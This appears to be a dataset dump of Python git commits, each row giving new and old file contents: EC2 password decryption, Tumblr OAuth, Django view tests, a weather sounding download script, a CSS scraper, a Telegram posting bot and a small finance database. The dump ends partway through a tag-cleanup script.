commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
18d66a1325e9c8825c4b33ea5438fe0ec8fcab33 | Don't swallow the underlying decrypt error | decrypt-windows-ec2-passwd.py | decrypt-windows-ec2-passwd.py | #!/usr/bin/env python
import base64, binascii, getpass, optparse, sys
from Crypto.PublicKey import RSA
def pkcs1_unpad(text):
#From http://kfalck.net/2011/03/07/decoding-pkcs1-padding-in-python
if len(text) > 0 and text[0] == '\x02':
# Find end of padding marked by nul
pos = text.find('\x00')
if pos > 0:
return text[pos+1:]
return None
def long_to_bytes (val, endianness='big'):
# From http://stackoverflow.com/questions/8730927/convert-python-long-int-to-fixed-size-byte-array
# one (1) hex digit per four (4) bits
try:
#Python < 2.7 doesn't have bit_length =(
width = val.bit_length()
except:
width = len(val.__hex__()[2:-1]) * 4
# unhexlify wants an even multiple of eight (8) bits, but we don't
# want more digits than we need (hence the ternary-ish 'or')
width += 8 - ((width % 8) or 8)
# format width specifier: four (4) bits per hex digit
fmt = '%%0%dx' % (width // 4)
# prepend zero (0) to the width, to zero-pad the output
s = binascii.unhexlify(fmt % val)
if endianness == 'little':
# see http://stackoverflow.com/a/931095/309233
s = s[::-1]
return s
def decryptPassword(rsaKey, password):
#Undo the whatever-they-do to the ciphertext to get the integer
encryptedData = base64.b64decode(password)
ciphertext = int(binascii.hexlify(encryptedData), 16)
#Decrypt it
plaintext = rsaKey.decrypt(ciphertext)
#This is the annoying part. long -> byte array
decryptedData = long_to_bytes(plaintext)
#Now Unpad it
unpaddedData = pkcs1_unpad(decryptedData)
#Done
return unpaddedData
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option("-k", "--key", dest="keyfile", default="~/.ssh/id_rsa", help="location of your ssh private key")
parser.add_option("-p", "--password", dest="password", help="encrypted password")
(options, args) = parser.parse_args()
if not options.keyfile or not options.password:
parser.print_help()
sys.exit(-1)
#Open your keyfile
try:
keyFile = open(options.keyfile)
except:
print "Could not find file", options.keyfile
sys.exit(-1)
#Read file
keyLines = keyFile.readlines()
#Import it
try:
key = RSA.importKey(keyLines, passphrase=getpass.getpass('Encrypted Key Password (leave blank if none): '))
except ValueError, ex:
print "Could not import SSH Key (Is it an RSA key? Is it password protected?): %s" % ex
sys.exit(-1)
#Decrypt it
print ""
print "Password:", decryptPassword(key, options.password)
| #!/usr/bin/env python
import base64, binascii, getpass, optparse, sys
from Crypto.PublicKey import RSA
def pkcs1_unpad(text):
#From http://kfalck.net/2011/03/07/decoding-pkcs1-padding-in-python
if len(text) > 0 and text[0] == '\x02':
# Find end of padding marked by nul
pos = text.find('\x00')
if pos > 0:
return text[pos+1:]
return None
def long_to_bytes (val, endianness='big'):
# From http://stackoverflow.com/questions/8730927/convert-python-long-int-to-fixed-size-byte-array
# one (1) hex digit per four (4) bits
try:
#Python < 2.7 doesn't have bit_length =(
width = val.bit_length()
except:
width = len(val.__hex__()[2:-1]) * 4
# unhexlify wants an even multiple of eight (8) bits, but we don't
# want more digits than we need (hence the ternary-ish 'or')
width += 8 - ((width % 8) or 8)
# format width specifier: four (4) bits per hex digit
fmt = '%%0%dx' % (width // 4)
# prepend zero (0) to the width, to zero-pad the output
s = binascii.unhexlify(fmt % val)
if endianness == 'little':
# see http://stackoverflow.com/a/931095/309233
s = s[::-1]
return s
def decryptPassword(rsaKey, password):
#Undo the whatever-they-do to the ciphertext to get the integer
encryptedData = base64.b64decode(password)
ciphertext = int(binascii.hexlify(encryptedData), 16)
#Decrypt it
plaintext = rsaKey.decrypt(ciphertext)
#This is the annoying part. long -> byte array
decryptedData = long_to_bytes(plaintext)
#Now Unpad it
unpaddedData = pkcs1_unpad(decryptedData)
#Done
return unpaddedData
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option("-k", "--key", dest="keyfile", default="~/.ssh/id_rsa", help="location of your ssh private key")
parser.add_option("-p", "--password", dest="password", help="encrypted password")
(options, args) = parser.parse_args()
if not options.keyfile or not options.password:
parser.print_help()
sys.exit(-1)
#Open your keyfile
try:
keyFile = open(options.keyfile)
except:
print "Could not find file", options.keyfile
sys.exit(-1)
#Read file
keyLines = keyFile.readlines()
#Import it
try:
key = RSA.importKey(keyLines, passphrase=getpass.getpass('Encrypted Key Password (leave blank if none): '))
except ValueError:
print "Could not import SSH Key (Is it an RSA key? Is it password protected?)"
sys.exit(-1)
#Decrypt it
print ""
print "Password:", decryptPassword(key, options.password)
| Python | 0.998796 |
57cb5546d0e832bae8b2171d42fc4428ebc6dc74 | add try for imports | tumb_borg/authorize.py | tumb_borg/authorize.py | #!/usr/bin/python
from tumblpy import Tumblpy as T
try:
from urllib.parse import urlparse, parse_qs
except ImportError:
from urlparse import urlparse, parse_qs
def authorize(KEY, SECRET, CALLBACK):
def get_authorization_properties():
t = T(KEY, SECRET)
return t \
.get_authentication_tokens(
callback_url=CALLBACK)
auth_p = get_authorization_properties()
def get_auth_url():
print('Please connect with Tumblr via: \n%s' \
% auth_p['auth_url'])
result_url = \
raw_input("Copy and paste the accepting url: ")
return result_url
def query_string(url):
return { k: v[0] for k, v in
parse_qs(urlparse(url).query).items() }
def query_string_auth():
return query_string(get_auth_url())
def authorized_tokens():
q = query_string_auth()
t = T(KEY, SECRET,
q['oauth_token'],
auth_p['oauth_token_secret'])
return t.get_authorized_tokens(q['oauth_verifier'])
def authorized_t():
a = authorized_tokens()
return T(KEY, SECRET,
a['oauth_token'],
a['oauth_token_secret'])
return authorized_t()
| #!/usr/bin/python
from tumblpy import Tumblpy as T
from urlparse import urlparse, parse_qs
def authorize(KEY, SECRET, CALLBACK):
def get_authorization_properties():
t = T(KEY, SECRET)
return t \
.get_authentication_tokens(
callback_url=CALLBACK)
auth_p = get_authorization_properties()
def get_auth_url():
print('Please connect with Tumblr via: \n%s' \
% auth_p['auth_url'])
result_url = \
raw_input("Copy and paste the accepting url: ")
return result_url
def query_string(url):
return { k: v[0] for k, v in
parse_qs(urlparse(url).query).items() }
def query_string_auth():
return query_string(get_auth_url())
def authorized_tokens():
q = query_string_auth()
t = T(KEY, SECRET,
q['oauth_token'],
auth_p['oauth_token_secret'])
return t.get_authorized_tokens(q['oauth_verifier'])
def authorized_t():
a = authorized_tokens()
return T(KEY, SECRET,
a['oauth_token'],
a['oauth_token_secret'])
return authorized_t()
| Python | 0 |
e5fd6111d164cee574cb929849934e0b2c7a70a1 | Add ArticleImportView tests | molo/core/api/tests/test_views.py | molo/core/api/tests/test_views.py | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
from mock import patch
from molo.core.api.tests.utils import mocked_requests_get
from molo.core.tests.base import MoloTestCaseMixin
class MainImportViewTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_raises_error_if_data_not_available(self):
form_data = {
"url": "http://localhost:8000/api/v2/pages/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertFormError(
response, "form", "url", [u"Please enter a valid URL."]
)
@patch("molo.core.api.forms.requests.get", side_effect=mocked_requests_get)
def test_redirects_to_parent_chooser(self, mock_get):
form_data = {
"url": "http://localhost:8000/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertContains(response, "Add Article")
class ArticleParentChooserTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_redirects_to_first_page_if_session_not_set(self):
response = self.client.get(reverse("molo_api:article-parent-chooser"))
self.assertEqual(
response["Location"],
reverse("molo_api:main-import")
)
class ArticleImportViewTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_redirects_to_main_page_if_session_not_set(self):
response = self.client.get(reverse("molo_api:article-import"))
self.assertEqual(
response["Location"],
reverse("molo_api:main-import")
)
def test_articles_can_be_imported(self):
pass | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
from mock import patch
from molo.core.api.tests.utils import mocked_requests_get
from molo.core.tests.base import MoloTestCaseMixin
class MainImportViewTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_raises_error_if_data_not_available(self):
form_data = {
"url": "http://localhost:8000/api/v2/pages/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertFormError(
response, "form", "url", [u"Please enter a valid URL."]
)
@patch("molo.core.api.forms.requests.get", side_effect=mocked_requests_get)
def test_redirects_to_parent_chooser(self, mock_get):
form_data = {
"url": "http://localhost:8000/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertContains(response, "Add Article")
class ArticleParentChooserView(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_redirects_to_first_page_if_session_not_set(self):
response = self.client.get(reverse("molo_api:article-parent-chooser"))
self.assertEqual(
response["Location"],
reverse("molo_api:main-import")
)
def test_redirects_to_article_import(self):
pass
| Python | 0 |
3a49982dfe1a94159bb2543540ae3638688c7c31 | make RAOB download backend more time forgiving | cgi-bin/request/raob.py | cgi-bin/request/raob.py | #!/usr/bin/env python
"""
Download interface for data from RAOB network
"""
import sys
import cgi
import datetime
import pytz
from pyiem.util import get_dbconn, ssw
from pyiem.network import Table as NetworkTable
def m(val):
"""Helper"""
if val is None:
return 'M'
return val
def fetcher(station, sts, ets):
"""Do fetching"""
dbconn = get_dbconn('postgis')
cursor = dbconn.cursor('raobstreamer')
stations = [station, ]
if station.startswith("_"):
nt = NetworkTable("RAOB")
stations = nt.sts[station]['name'].split("--")[1].strip().split(",")
cursor.execute("""
SELECT f.valid at time zone 'UTC', p.levelcode, p.pressure, p.height,
p.tmpc, p.dwpc, p.drct, round((p.smps * 1.94384)::numeric,0),
p.bearing, p.range_miles, f.station from
raob_profile p JOIN raob_flights f on
(f.fid = p.fid) WHERE f.station in %s and valid >= %s and valid < %s
""", (tuple(stations), sts, ets))
ssw(("station,validUTC,levelcode,pressure_mb,height_m,tmpc,"
"dwpc,drct,speed_kts,bearing,range_sm\n"))
for row in cursor:
ssw(("%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n"
) % (row[10], m(row[0]),
m(row[1]), m(row[2]), m(row[3]), m(row[4]),
m(row[5]), m(row[6]), m(row[7]),
m(row[8]), m(row[9])))
def friendly_date(form, key):
"""More forgiving date conversion"""
val = form.getfirst(key)
try:
val = val.strip()
if len(val.split()) == 1:
dt = datetime.datetime.strptime(val, '%m/%d/%Y')
else:
dt = datetime.datetime.strptime(val, '%m/%d/%Y %H:%M')
dt = dt.replace(tzinfo=pytz.UTC)
except Exception as _exp:
ssw('Content-type: text/plain\n\n')
ssw(('Invalid %s date provided, should be "%%m/%%d/%%Y %%H:%%M"'
' in UTC timezone'
) % (key, ))
sys.exit()
return dt
def main():
"""Go Main Go"""
form = cgi.FieldStorage()
sts = friendly_date(form, 'sts')
ets = friendly_date(form, 'ets')
station = form.getfirst('station', 'KOAX')[:4]
if form.getfirst('dl', None) is not None:
ssw('Content-type: application/octet-stream\n')
ssw(("Content-Disposition: attachment; filename=%s_%s_%s.txt\n\n"
) % (station, sts.strftime("%Y%m%d%H"),
ets.strftime("%Y%m%d%H")))
else:
ssw('Content-type: text/plain\n\n')
fetcher(station, sts, ets)
if __name__ == '__main__':
main()
| #!/usr/bin/env python
"""
Download interface for data from RAOB network
"""
import cgi
import datetime
import pytz
from pyiem.util import get_dbconn, ssw
from pyiem.network import Table as NetworkTable
def m(val):
"""Helper"""
if val is None:
return 'M'
return val
def fetcher(station, sts, ets):
"""Do fetching"""
dbconn = get_dbconn('postgis')
cursor = dbconn.cursor()
stations = [station, ]
if station.startswith("_"):
nt = NetworkTable("RAOB")
stations = nt.sts[station]['name'].split("--")[1].strip().split(",")
cursor.execute("""
SELECT f.valid at time zone 'UTC', p.levelcode, p.pressure, p.height,
p.tmpc, p.dwpc, p.drct, round((p.smps * 1.94384)::numeric,0),
p.bearing, p.range_miles, f.station from
raob_profile p JOIN raob_flights f on
(f.fid = p.fid) WHERE f.station in %s and valid >= %s and valid < %s
""", (tuple(stations), sts, ets))
ssw(("station,validUTC,levelcode,pressure_mb,height_m,tmpc,"
"dwpc,drct,speed_kts,bearing,range_sm\n"))
for row in cursor:
ssw(("%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n"
) % (row[10], m(row[0]),
m(row[1]), m(row[2]), m(row[3]), m(row[4]),
m(row[5]), m(row[6]), m(row[7]),
m(row[8]), m(row[9])))
def main():
"""Go Main Go"""
form = cgi.FieldStorage()
sts = datetime.datetime.strptime(form.getfirst('sts', ''),
'%m/%d/%Y %H:%M')
sts = sts.replace(tzinfo=pytz.utc)
ets = datetime.datetime.strptime(form.getfirst('ets', ''),
'%m/%d/%Y %H:%M')
ets = ets.replace(tzinfo=pytz.utc)
station = form.getfirst('station', 'KOAX')[:4]
if form.getfirst('dl', None) is not None:
ssw('Content-type: application/octet-stream\n')
ssw(("Content-Disposition: attachment; filename=%s_%s_%s.txt\n\n"
) % (station, sts.strftime("%Y%m%d%H"),
ets.strftime("%Y%m%d%H")))
else:
ssw('Content-type: text/plain\n\n')
fetcher(station, sts, ets)
if __name__ == '__main__':
main()
| Python | 0 |
722de274d3ee9866c7580a7f95e32de1777e6a3b | Add note | csscms/properties_scraper.py | csscms/properties_scraper.py | from pyquery import PyQuery as pq
"""
A quick and dirty scraper for w3c's css properties list.
See css_properties.py for the example output. This is meant to be run once, except when new properties
need to be scraped.
"""
def strip_all_prefixes(string):
bad_prefixes = [
'text-text-',
'pos-',
'font-font-',
'nav-',
'class-',
'gen-',
'tab-'
]
for prefix in bad_prefixes:
string = string.replace(prefix, '')
return string
def normalize_w3c_link(url):
url = strip_all_prefixes(url)
return '-'.join(url.replace(
'.asp', '').replace('css3_pr_', '').replace('pr_', '').split('_'))
def load_all_w3c_props(root_url, max_open=None):
table_class = '.reference.notranslate'
data = {}
urls = []
doc = pq(url=root_url)
links = pq(doc).find(table_class).find('a')
def _process(_, selector):
if selector is not None:
prop = pq(selector).find('td').eq(0).text().strip()
if len(prop) > 0:
return urls.append(prop)
else:
return ''
for k, link in enumerate(links):
if max_open is not None:
if k >= max_open:
break
url = pq(link).attr('href')
follow_doc = pq(url='{}/{}'.format(root_url, url))
pq(follow_doc).find(table_class).find('tr').each(_process)
# Normalize property from w3c's url structure
url = normalize_w3c_link(url)
# Push all current options
data[url] = {'dropdown': True, 'props': urls}
# Mutable container, empty it out for reuse
urls = []
return data
print(load_all_w3c_props('http://www.w3schools.com/cssref/'))
| from pyquery import PyQuery as pq
"""A quick and dirty scraper for w3c's css properties list."""
def strip_all_prefixes(string):
bad_prefixes = [
'text-text-',
'pos-',
'font-font-',
'nav-',
'class-',
'gen-',
'tab-'
]
for prefix in bad_prefixes:
string = string.replace(prefix, '')
return string
def normalize_w3c_link(url):
url = strip_all_prefixes(url)
return '-'.join(url.replace(
'.asp', '').replace('css3_pr_', '').replace('pr_', '').split('_'))
def load_all_w3c_props(root_url, max_open=None):
table_class = '.reference.notranslate'
data = {}
urls = []
doc = pq(url=root_url)
links = pq(doc).find(table_class).find('a')
def _process(_, selector):
if selector is not None:
prop = pq(selector).find('td').eq(0).text().strip()
if len(prop) > 0:
return urls.append(prop)
else:
return ''
for k, link in enumerate(links):
if max_open is not None:
if k >= max_open:
break
url = pq(link).attr('href')
follow_doc = pq(url='{}/{}'.format(root_url, url))
pq(follow_doc).find(table_class).find('tr').each(_process)
# Normalize property from w3c's url structure
url = normalize_w3c_link(url)
# Push all current options
data[url] = {'dropdown': True, 'props': urls}
# Mutable container, empty it out for reuse
urls = []
return data
print(load_all_w3c_props('http://www.w3schools.com/cssref/'))
| Python | 0 |
d13204abb2cf5d341eff78416dd442c303042697 | Modify add_occupant method to raise exception in case of a duplicate | classes/room.py | classes/room.py | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if person not in self.persons:
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
else:
raise Exception(person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " is already among the occupants in " + self.room_type + " " + self.room_name.title())
| class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| Python | 0 |
90d3f00cd8fea8fab9274069ac06ea461f8e4dfd | Send only pics and gifs to OOO_B_R. | channels/ooo_b_r/app.py | channels/ooo_b_r/app.py | #encoding:utf-8
from utils import get_url, weighted_random_subreddit
# Group chat https://yal.sh/dvdahoy
t_channel = '-1001065558871'
subreddit = weighted_random_subreddit({
'ANormalDayInRussia': 1.0,
'ANormalDayInAmerica': 0.1,
'ANormalDayInJapan': 0.01
})
def send_post(submission, r2t):
what, url, ext = get_url(submission)
title = submission.title
link = submission.shortlink
text = '{}\n{}'.format(title, link)
return r2t.send_gif_img(what, url, ext, text)
| #encoding:utf-8
from utils import get_url, weighted_random_subreddit
# Group chat https://yal.sh/dvdahoy
t_channel = '-1001065558871'
subreddit = weighted_random_subreddit({
'ANormalDayInRussia': 1.0,
'ANormalDayInAmerica': 0.1,
'ANormalDayInJapan': 0.01
})
def send_post(submission, r2t):
what, url, ext = get_url(submission)
title = submission.title
link = submission.shortlink
text = '{}\n{}'.format(title, link)
if what == 'text':
return False
elif what == 'other':
return False
elif what == 'album':
r2t.send_album(url)
return True
elif what in ('gif', 'img'):
return r2t.send_gif_img(what, url, ext, text)
else:
return False
| Python | 0 |
e309ed0a2f1f991e4015fcede373dccfe3843d97 | Change version tag. | core/info/info.py | core/info/info.py | # -*- coding: utf-8 -*-
"""Informations.
+ Pyslvs version.
+ Module versions.
+ Help descriptions.
+ Check for update function.
"""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2018"
__license__ = "AGPL"
__email__ = "pyslvs@gmail.com"
from sys import version_info
import platform
import argparse
import requests
from core.QtModules import (
QProgressDialog,
qVersion,
PYQT_VERSION_STR
)
Qt_Version = qVersion().strip()
PyQt_Version = PYQT_VERSION_STR.strip()
VERSION = (18, 3, 0, 'release')
INFO = (
"Pyslvs {}.{}.{}({})".format(*VERSION),
"OS Type: {} {} [{}]".format(platform.system(), platform.release(), platform.machine()),
"Python Version: {v.major}.{v.minor}.{v.micro}({v.releaselevel})".format(v=version_info),
"Python Compiler: {}".format(platform.python_compiler()),
"Qt Version: {}".format(Qt_Version),
"PyQt Version: {}".format(PyQt_Version)
)
POWERBY = (
"Python IDE Eric 6",
"PyQt 5",
"dxfwrite",
"Cython",
"PyZMQ",
"openpyxl",
"psutil",
"peewee",
"Lark-parser",
"NetworkX",
"Pydot"
)
"""--help arguments"""
parser = argparse.ArgumentParser(
description="Pyslvs - Open Source Planar Linkage Mechanism Simulation and Mechanical Synthesis System. ",
epilog="Power by {}.".format(", ".join(POWERBY))
)
parser.add_argument('-v', '--version', action='version', help="show version infomations and exit", version=INFO[0])
parser.add_argument('r', metavar='FILE PATH', default=False, nargs='?', type=str, help="read workbook from the file path")
parser.add_argument('-i', metavar='START PATH', default=False, nargs='?', type=str, help="start Pyslvs in the specified path")
parser.add_argument('-w', action='store_true', help="show rebuild warning of canvas")
parser.add_argument('-f', '--fusion', action='store_true', help="run Pyslvs in Fusion style")
parser.add_argument('--full-screen', action='store_true', help="start Pyslvs with full-screen mode")
parser.add_argument('--server', metavar='PORT', default=False, nargs='?', type=str, help="start ZMQ server")
parser.add_argument('-d', '--debug-mode', action='store_true', help="do not connect to GUI console when opening")
parser.add_argument('-t', '--test', action='store_true', help="startup the program to test imported modules")
ARGUMENTS = parser.parse_args()
def check_update(progdlg: QProgressDialog) -> [str, bool]:
"""Check for update."""
m = progdlg.maximum()
from core.QtModules import QCoreApplication
for i in range(m):
QCoreApplication.processEvents()
if progdlg.wasCanceled():
return
next = list(VERSION[:m])
next[i] += 1
url = "https://github.com/KmolYuan/Pyslvs-PyQt5/releases/tag/v{}.{:02}.{}".format(*next)
request = requests.get(url)
progdlg.setValue(i + 1)
if request.status_code == 200:
progdlg.setValue(m)
return url
return False
| # -*- coding: utf-8 -*-
"""Informations.
+ Pyslvs version.
+ Module versions.
+ Help descriptions.
+ Check for update function.
"""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2018"
__license__ = "AGPL"
__email__ = "pyslvs@gmail.com"
from sys import version_info
import platform
import argparse
import requests
from core.QtModules import (
QProgressDialog,
qVersion,
PYQT_VERSION_STR
)
Qt_Version = qVersion().strip()
PyQt_Version = PYQT_VERSION_STR.strip()
VERSION = (18, 3, 0, 'dev')
INFO = (
"Pyslvs {}.{}.{}({})".format(*VERSION),
"OS Type: {} {} [{}]".format(platform.system(), platform.release(), platform.machine()),
"Python Version: {v.major}.{v.minor}.{v.micro}({v.releaselevel})".format(v=version_info),
"Python Compiler: {}".format(platform.python_compiler()),
"Qt Version: {}".format(Qt_Version),
"PyQt Version: {}".format(PyQt_Version)
)
POWERBY = (
"Python IDE Eric 6",
"PyQt 5",
"dxfwrite",
"Cython",
"PyZMQ",
"openpyxl",
"psutil",
"peewee",
"Lark-parser",
"NetworkX",
"Pydot"
)
"""--help arguments"""
parser = argparse.ArgumentParser(
description="Pyslvs - Open Source Planar Linkage Mechanism Simulation and Mechanical Synthesis System. ",
epilog="Power by {}.".format(", ".join(POWERBY))
)
parser.add_argument('-v', '--version', action='version', help="show version infomations and exit", version=INFO[0])
parser.add_argument('r', metavar='FILE PATH', default=False, nargs='?', type=str, help="read workbook from the file path")
parser.add_argument('-i', metavar='START PATH', default=False, nargs='?', type=str, help="start Pyslvs in the specified path")
parser.add_argument('-w', action='store_true', help="show rebuild warning of canvas")
parser.add_argument('-f', '--fusion', action='store_true', help="run Pyslvs in Fusion style")
parser.add_argument('--full-screen', action='store_true', help="start Pyslvs with full-screen mode")
parser.add_argument('--server', metavar='PORT', default=False, nargs='?', type=str, help="start ZMQ server")
parser.add_argument('-d', '--debug-mode', action='store_true', help="do not connect to GUI console when opening")
parser.add_argument('-t', '--test', action='store_true', help="startup the program to test imported modules")
ARGUMENTS = parser.parse_args()
def check_update(progdlg: QProgressDialog) -> [str, bool]:
"""Check for update."""
m = progdlg.maximum()
from core.QtModules import QCoreApplication
for i in range(m):
QCoreApplication.processEvents()
if progdlg.wasCanceled():
return
next = list(VERSION[:m])
next[i] += 1
url = "https://github.com/KmolYuan/Pyslvs-PyQt5/releases/tag/v{}.{:02}.{}".format(*next)
request = requests.get(url)
progdlg.setValue(i + 1)
if request.status_code == 200:
progdlg.setValue(m)
return url
return False
| Python | 0 |
35d2a174d671e29e08ad512f9bee08e150d39984 | Save original, then parse amounts. | db/db.py | db/db.py | #!/usr/bin/python
import sys
import copy
import json
import getpass
import aesjsonfile
sys.path.append("../")
import config
def parse_amount(amount):
if type(amount) == int:
return amount
if "." not in amount:
amount += ".00"
return int(amount.replace("$","").replace(",","").replace(".",""))
class DB(object):
def __init__(self, username, password):
self.username = username
self.password = password
self.db = aesjsonfile.load("%s/%s.json"%(config.dbdir, self.username), self.password)
self.db.setdefault("transactions",[])
self.db.setdefault("balances",{})
self.db.setdefault("accounts",[])
def save(self):
aesjsonfile.dump("%s/%s.json"%(config.dbdir, self.username), self.db, self.password)
def accountstodo(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
trans = self.search({"account":acct["name"]},limit=5)
acct["seenids"] = [x["id"] for x in trans]
if trans:
acct["lastcheck"] = trans[0]["date"]
return ret
def accounts(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
acct.pop("password",None)
acct["subaccounts"] = []
for sub in self.db["balances"].get(acct["name"],{}):
acct["subaccounts"].append({"name": sub, "amount": self.db["balances"][acct["name"]][sub][0]["amount"],
"date": self.db["balances"][acct["name"]][sub][0]["lastdate"]})
return ret
def search(self, query={}, startdate="0", enddate = "9999", limit=100):
ret = []
for trans in self.db["transactions"]:
if trans["date"] < startdate or trans["date"] > enddate:
continue
if type(query) in [ str, unicode ]:
if query not in json.dumps(trans.values()):
continue
elif query and type(query) == dict:
for k in query:
if not trans.get(k) or query[k] not in trans[k]:
continue
ret.append(trans)
if len(trans) >= limit:
break
return ret
def getallids(self):
return [x["id"] for x in self.db["transactions"]]
def newtransactions(self, data):
for trans in data.get("transactions",[]):
if trans["id"] not in self.getallids():
for k,v in trans.iteritems():
trans["orig_"+k] = v
trans["orig_amount_str"] = trans["amount"]
trans["amount"] = parse_amount(trans["amount"])
self.db["transactions"].append(trans)
self.db["transactions"].sort(cmp=lambda x,y: cmp(x["date"],y["date"]) or cmp(x["id"],y["id"]), reverse=True)
for bal in data.get("balances",[]):
amount = parse_amount(bal["balance"])
oldbal = self.db["balances"].setdefault(bal["account"],{}).setdefault(bal["subaccount"],[])
if oldbal and oldbal[0]["amount"] == amount:
oldbal[0]["lastdate"] = bal["date"]
else:
oldbal.insert(0, {"amount": amount, "firstdate": bal["date"], "lastdate": bal["date"]})
self.save()
return True
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(1)
password = getpass.getpass()
db = DB(sys.argv[1],password)
print "accountstodo"
print json.dumps(db.accountstodo(), indent=2)
print "accounts"
print json.dumps(db.accounts(), indent=2)
print json.dumps(db.search(limit=10), indent=2)
| #!/usr/bin/python
import sys
import copy
import json
import getpass
import aesjsonfile
sys.path.append("../")
import config
def parse_amount(amount):
if type(amount) == int:
return amount
if "." not in amount:
amount += ".00"
return int(amount.replace("$","").replace(",","").replace(".",""))
class DB(object):
def __init__(self, username, password):
self.username = username
self.password = password
self.db = aesjsonfile.load("%s/%s.json"%(config.dbdir, self.username), self.password)
self.db.setdefault("transactions",[])
self.db.setdefault("balances",{})
self.db.setdefault("accounts",[])
def save(self):
aesjsonfile.dump("%s/%s.json"%(config.dbdir, self.username), self.db, self.password)
def accountstodo(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
trans = self.search({"account":acct["name"]},limit=5)
acct["seenids"] = [x["id"] for x in trans]
if trans:
acct["lastcheck"] = trans[0]["date"]
return ret
def accounts(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
acct.pop("password",None)
acct["subaccounts"] = []
for sub in self.db["balances"].get(acct["name"],{}):
acct["subaccounts"].append({"name": sub, "amount": self.db["balances"][acct["name"]][sub][0]["amount"],
"date": self.db["balances"][acct["name"]][sub][0]["lastdate"]})
return ret
def search(self, query={}, startdate="0", enddate = "9999", limit=100):
ret = []
for trans in self.db["transactions"]:
if trans["date"] < startdate or trans["date"] > enddate:
continue
if type(query) in [ str, unicode ]:
if query not in json.dumps(trans.values()):
continue
elif query and type(query) == dict:
for k in query:
if not trans.get(k) or query[k] not in trans[k]:
continue
ret.append(trans)
if len(trans) >= limit:
break
return ret
def getallids(self):
return [x["id"] for x in self.db["transactions"]]
def newtransactions(self, data):
for trans in data.get("transactions",[]):
if trans["id"] not in self.getallids():
for k,v in trans.iteritems():
trans["orig_"+k] = v
self.db["transactions"].append(trans)
self.db["transactions"].sort(cmp=lambda x,y: cmp(x["date"],y["date"]) or cmp(x["id"],y["id"]), reverse=True)
for bal in data.get("balances",[]):
amount = parse_amount(bal["balance"])
oldbal = self.db["balances"].setdefault(bal["account"],{}).setdefault(bal["subaccount"],[])
if oldbal and oldbal[0]["amount"] == amount:
oldbal[0]["lastdate"] = bal["date"]
else:
oldbal.insert(0, {"amount": amount, "firstdate": bal["date"], "lastdate": bal["date"]})
self.save()
return True
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(1)
password = getpass.getpass()
db = DB(sys.argv[1],password)
print "accountstodo"
print json.dumps(db.accountstodo(), indent=2)
print "accounts"
print json.dumps(db.accounts(), indent=2)
print json.dumps(db.search(limit=10), indent=2)
| Python | 0 |
d966b0973da71f5c883697ddd12c2728b2a04cce | Improve git tag to version conversion | ci/cleanup-binary-tags.py | ci/cleanup-binary-tags.py | #!/usr/bin/env python3
import os
import subprocess
import re
import semver
def tag_to_version(tag):
return tag.split('-')[1].lstrip('v')
subprocess.check_call('git pull --tags', shell=True)
tags = subprocess.check_output(
'git tag --list | grep binary', shell=True).decode('UTF-8').splitlines()
versions = sorted(list(set([tag_to_version(tag) for tag in tags])),
key=semver.parse_version_info)
versions_to_delete = versions[:-3]
cmd_delete_local = 'git tag --delete'
cmd_delete_remote = 'git push --delete '
